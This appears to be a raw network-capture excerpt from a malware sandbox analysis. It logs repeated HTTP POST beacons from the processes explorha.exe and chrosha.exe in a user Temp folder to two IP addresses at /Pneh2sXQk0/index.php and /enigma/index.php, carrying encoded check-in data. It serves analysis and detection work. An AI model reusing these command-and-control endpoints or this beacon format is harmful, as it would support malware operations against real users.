                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:44.278537035 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      818192.168.2.550666193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:44.401892900 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:44.646271944 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      819192.168.2.550667193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:44.640439987 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:44.888995886 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      820192.168.2.550668193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:44.899013042 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:45.149136066 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      821192.168.2.550669193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:45.140919924 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:45.388838053 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      822192.168.2.550670193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:45.505260944 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:45.749106884 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      823192.168.2.550671193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:45.755362988 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:45.999897003 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      824192.168.2.550672193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:45.993355989 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:46.237643003 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      825192.168.2.550673193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:46.249335051 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:46.498030901 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      826192.168.2.550674193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:46.599246025 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:46.841931105 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      827192.168.2.550675193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:46.851942062 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:47.098614931 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      828192.168.2.550676193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:47.095530033 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:47.350264072 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      829192.168.2.550677193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:47.355653048 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:47.606002092 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      830192.168.2.550678193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:47.713692904 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:47.957876921 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      831192.168.2.550679193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:47.966485977 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:48.218213081 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      832192.168.2.550680193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:48.208069086 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:48.457617998 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      833192.168.2.550681193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:48.471487045 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
